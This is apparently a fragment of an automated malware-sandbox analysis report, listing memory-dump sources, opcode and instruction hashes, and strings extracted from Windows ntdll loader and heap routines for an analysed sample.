                                                          • Opcode Fuzzy Hash: 2ac87e4a21756ef9783842eecb550936372ee867e08241027b64c16e295a2a9c
                                                          • Instruction Fuzzy Hash: 8EF1CE30605606DFEB25DF68C884BAEB7F9FF85304F1481A9E4969B385D734E981CB90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: $@
                                                          • API String ID: 2994545307-1077428164
                                                          • Opcode ID: 54d1b6732ac962dbc734d1b9c060b332ca1d5f52a08f353247a1ff07620765cd
                                                          • Instruction ID: 8070829215b1bf8fe26335222490d9bd1e9763a0453f667387a41368d39c828e
                                                          • Opcode Fuzzy Hash: 54d1b6732ac962dbc734d1b9c060b332ca1d5f52a08f353247a1ff07620765cd
                                                          • Instruction Fuzzy Hash: 2FC280B16083419FE765CF28C980BABBBE5BF89714F04896DF9C987241E735D844CB62
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                          • API String ID: 0-2779062949
                                                          • Opcode ID: b5aad50457b054e381829809e6b88fbcbd31b33cb3ff2a456bb539a2e8d24714
                                                          • Instruction ID: f53bddf8eba6613ee0e23d8ea55d7073c2b114efea3b853a21fcc8a5249314ee
                                                          • Opcode Fuzzy Hash: b5aad50457b054e381829809e6b88fbcbd31b33cb3ff2a456bb539a2e8d24714
                                                          • Instruction Fuzzy Hash: ABA17F71D1122A9BEB31DF68CD88BEAB7B8EF44700F0041EAE949A7250D7359E84CF54
                                                          Strings
                                                          • Failed to allocated memory for shimmed module list, xrefs: 0108A10F
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0108A121
                                                          • LdrpCheckModule, xrefs: 0108A117
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-161242083
                                                          • Opcode ID: 87b52f3686ce3672b46677836dec3fd9946f86b624ba1d0542deadbda8e74204
                                                          • Instruction ID: 2a6151d4e69a2e23f0f047cc2cceff3c999a4bda01d94a806b0d2bbd71704652
                                                          • Opcode Fuzzy Hash: 87b52f3686ce3672b46677836dec3fd9946f86b624ba1d0542deadbda8e74204
                                                          • Instruction Fuzzy Hash: 7A71E2B0A0020ADFDB29EF68C980AEEB7F4FB44304F14407DE992A7655D774A981CB54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-1334570610
                                                          • Opcode ID: cdfb2550545b29803fea3a2f8e3c7e3d79752c3c196c753d350cd9ea3b22de29
                                                          • Instruction ID: 4d41d1d6cc4aad4e43bd4378a8e39d0f9200b25478e1bed491e69fda5f7db09b
                                                          • Opcode Fuzzy Hash: cdfb2550545b29803fea3a2f8e3c7e3d79752c3c196c753d350cd9ea3b22de29
                                                          • Instruction Fuzzy Hash: 1E610270605305DFDB29DF28C840BAABBE5FF85304F1485A9E4D98F29AD770E881CB91
                                                          Strings
                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 010982DE
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010982E8
                                                          • Failed to reallocate the system dirs string !, xrefs: 010982D7
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1783798831
                                                          • Opcode ID: 71d7eef58f66d9cdd6744dbc8c298816916caff0320a3d6a1f911cb94fc7ce3a
                                                          • Instruction ID: 1e1ef166de3cedc577f33a5fa193b5355213ba80ba1d107e3a669c5b5fb7c0e2
                                                          • Opcode Fuzzy Hash: 71d7eef58f66d9cdd6744dbc8c298816916caff0320a3d6a1f911cb94fc7ce3a
                                                          • Instruction Fuzzy Hash: 1241EFB1504309ABD765EB68DA44B9BB7E8FF48B50F00493AF9A4D7294E770E840CB91
                                                          Strings
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 010DC1C5
                                                          • @, xrefs: 010DC1F1
                                                          • PreferredUILanguages, xrefs: 010DC212
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                          • API String ID: 0-2968386058
                                                          • Opcode ID: 6104ada44cc48f715680f14ecc043d36a7020e6ab58c935b3ee201b04bd30662
                                                          • Instruction ID: bc1af31c153b50f8e9dfd3dbb58441acbb756fa50117ad4fc641619283c008bb
                                                          • Opcode Fuzzy Hash: 6104ada44cc48f715680f14ecc043d36a7020e6ab58c935b3ee201b04bd30662
                                                          • Instruction Fuzzy Hash: 91416171E00309EBEB51DAD8C981BEEBBFDAB54700F14416AE689B7284D7749E44CB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                          • API String ID: 0-1373925480
                                                          • Opcode ID: ae35ff4b9cc27a298010d3251c86da4099738e5063587642c8f9d6b09df8405c
                                                          • Instruction ID: 99554143ceaf04495c9d280f77728ae0595f511aeb07f20d202e4204de52a781
                                                          • Opcode Fuzzy Hash: ae35ff4b9cc27a298010d3251c86da4099738e5063587642c8f9d6b09df8405c
                                                          • Instruction Fuzzy Hash: 5241E4719006598BEB25DB98D884BEDBBF8FF55340F1408A9D982EF792D6349A01CB50
                                                          Strings
                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 010A4888
                                                          • LdrpCheckRedirection, xrefs: 010A488F
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 010A4899
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-3154609507
                                                          • Opcode ID: ba428cacbcf6e62cecc1335293d680e9c77895816bb13fc0ec38a492d714e348
                                                          • Instruction ID: a472554cba1e1b354912e4c671926a18a8f592c567fe498d97bae61b6da8174b
                                                          • Opcode Fuzzy Hash: ba428cacbcf6e62cecc1335293d680e9c77895816bb13fc0ec38a492d714e348
                                                          • Instruction Fuzzy Hash: 8241D33AA047919FCB61CE98E940A6EBBE5FF49A50B4901A9EDD5D7251D3B0E800CB81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-2558761708
                                                          Strings
                                                          • Process initialization failed with status 0x%08lx, xrefs: 010A20F3
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010A2104
                                                          • LdrpInitializationFailure, xrefs: 010A20FA
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2986994758
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: #%u
                                                          • API String ID: 48624451-232158463
                                                          Strings
                                                          • LdrResSearchResource Enter, xrefs: 0102AA13
                                                          • LdrResSearchResource Exit, xrefs: 0102AA25
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                          • API String ID: 0-4066393604
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `$`
                                                          • API String ID: 0-197956300
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Legacy$UEFI
                                                          • API String ID: 2994545307-634100481
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$MUI
                                                          • API String ID: 0-17815947
                                                          Strings
                                                          • kLsE, xrefs: 01020540
                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0102063D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                          • API String ID: 0-2547482624
                                                          Strings
                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0102A309
                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0102A2FB
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                          • API String ID: 0-2876891731
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Cleanup Group$Threadpool!
                                                          • API String ID: 2994545307-4008356553
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: MUI
                                                          • API String ID: 0-1339004836
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalTags
                                                          • API String ID: 0-1106856819
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .mui
                                                          • API String ID: 0-1199573805
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: EXT-
                                                          • API String ID: 0-1948896318
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryHash
                                                          • API String ID: 0-2202222882
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -
                                                          • API String ID: 0-2547889144
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryName
                                                          • API String ID: 0-215506332
                                                          Strings
                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 010A895E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                          • API String ID: 0-702105204
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 220f57733662858959e8c8a7fe6acc64374db4942de8a24163611d6e2cbe8da6
                                                          • Instruction ID: 39bc09ccccd41737f4a400bdcbe37848344ab6114a72f5c3e2c4ad452a5167b7
                                                          • Opcode Fuzzy Hash: 220f57733662858959e8c8a7fe6acc64374db4942de8a24163611d6e2cbe8da6
                                                          • Instruction Fuzzy Hash: 19424E75A102198FEB64CF69C881BEDBBF9BF48300F14C09AE989EB251D7349985CF50
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7765c921159ce2342d60e79b39d9f416c36e50ac994ec7568e56b181f80a6c5f
                                                          • Instruction ID: 8dfcad981110223066f633d92ecc0027c5a7bb63e021ebc0df63b5860ee48083
                                                          • Opcode Fuzzy Hash: 7765c921159ce2342d60e79b39d9f416c36e50ac994ec7568e56b181f80a6c5f
                                                          • Instruction Fuzzy Hash: 41320070A087558FDB65EF69C8447BEBBF2BF84304F21416DD5CA9B284DB36A842CB50
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d42a29f843ad5ecbbf6fb08571245bad5a429cead11a4b4b752eb338ec6db195
                                                          • Instruction ID: ea4c1cb7a050c5e4df7f33f827f9a27d17bc00dcfb469e263835297ac14962a2
                                                          • Opcode Fuzzy Hash: d42a29f843ad5ecbbf6fb08571245bad5a429cead11a4b4b752eb338ec6db195
                                                          • Instruction Fuzzy Hash: 2722AB70704669CBEB658F29C45437EBBE1BF84A00F08859DE9C68B286F735D442DF60
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b41e2950ecd6c45134c6066a11cd4446e8848993ef1929707eaedae2583babc
                                                          • Instruction ID: 2fd24a3470ea54dd47f81cf423637d89486449e1d00ca1c483393b0b621194aa
                                                          • Opcode Fuzzy Hash: 3b41e2950ecd6c45134c6066a11cd4446e8848993ef1929707eaedae2583babc
                                                          • Instruction Fuzzy Hash: B632CF70A04215CFDB65DF68C480BAEBBF1FF48310F1485A9E995AB791DB31E841CB50
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                          • Instruction ID: 7ca6206ceb837673143f396eee8d2486cbb92facdada31f8083d0c96fb10a8d6
                                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                          • Instruction Fuzzy Hash: D1F15FB1E0021A9BDB55DF99C5D0BAEBBF5BF48710F088169E985EB340E774D841CBA0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d8b863a27fdbee64a42e27d260bb7d1fa99001c1c3ec49033658216e84d2c0a7
                                                          • Instruction ID: 99cd0db76ccd2182ea668be1c27a375e0e7dce7a858abc2da71575c2e89cb549
                                                          • Opcode Fuzzy Hash: d8b863a27fdbee64a42e27d260bb7d1fa99001c1c3ec49033658216e84d2c0a7
                                                          • Instruction Fuzzy Hash: FBD1E271A0060A8BDF19CF69C881AFEB7F9AF88304F18C16BD995A7251D735E905CB60
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: df8bb7e65b36b1c310e48759c8cb1b5112e89155e635d7e4039ec5299d558618
                                                          • Instruction ID: ae05b350aab38ffd573fdb55585efcd388e66856df53cde9cd202dd0fe2728df
                                                          • Opcode Fuzzy Hash: df8bb7e65b36b1c310e48759c8cb1b5112e89155e635d7e4039ec5299d558618
                                                          • Instruction Fuzzy Hash: 3FE19071608352CFC715DF28C490A6ABBE4FF89314F058AADE9D987351DB32E905CB92
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 96655d25305e42bfaf805d22b264c0469171ebbc4c5bbc849e952ff8af452378
                                                          • Instruction ID: 1f22653b26d8fedaad5d8d2ce400aef05bb626809e8ab32c5b3f1ae7d361397a
                                                          • Opcode Fuzzy Hash: 96655d25305e42bfaf805d22b264c0469171ebbc4c5bbc849e952ff8af452378
                                                          • Instruction Fuzzy Hash: D8D1D671A006069BDB14DF68C880ABEB7E5BF54314F04C66EFA95DB284EB38DA54CB50
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                          • Instruction ID: e2ca79410c601fe4ded475230a323e139f429150721844f0d99d2b87296712ae
                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                          • Instruction Fuzzy Hash: 00B17374A006059FEB64DFD9C940ABBBBF9FF84305F90C45EAA8297790DA34E945CB10
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                          • Instruction ID: 720eddf6b0620d552ac42b47d62ec21cf7d7a5779793b61dc03c00f84279cbdb
                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                          • Instruction Fuzzy Hash: 93B1F6316056469FDB16DB68C850BBFBBFAAF88300F144599E5D2DB385DB30E941CB90
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d51f7610b24fc9bd2c5fbfb9012ee36cf53e5e9020f3754b30a7ae06d0b4905a
                                                          • Instruction ID: 5d1e9b972679cb1f072a13431a6401586e1a3c3d2d3db3bec385efe37ea24fdd
                                                          • Opcode Fuzzy Hash: d51f7610b24fc9bd2c5fbfb9012ee36cf53e5e9020f3754b30a7ae06d0b4905a
                                                          • Instruction Fuzzy Hash: FFC147745083418FE7A4DF18C494BABB7E5BF88304F44896EE9C987291DB74E909CF92
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f922dcbe852bd7d583b5bd357cf629ad499673a1a59d4bd4fa95ccce96772fa
                                                          • Instruction ID: ac34b8a75ac816c4e2ae0803c0fb0c6d5c336aa9c7adb2fc9bbb45f41c0946dc
                                                          • Opcode Fuzzy Hash: 4f922dcbe852bd7d583b5bd357cf629ad499673a1a59d4bd4fa95ccce96772fa
                                                          • Instruction Fuzzy Hash: AAB18170A402668BEB64CF58C980BADB7F5EF44740F0485E9D58AE7285EB34DDC5CB24
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
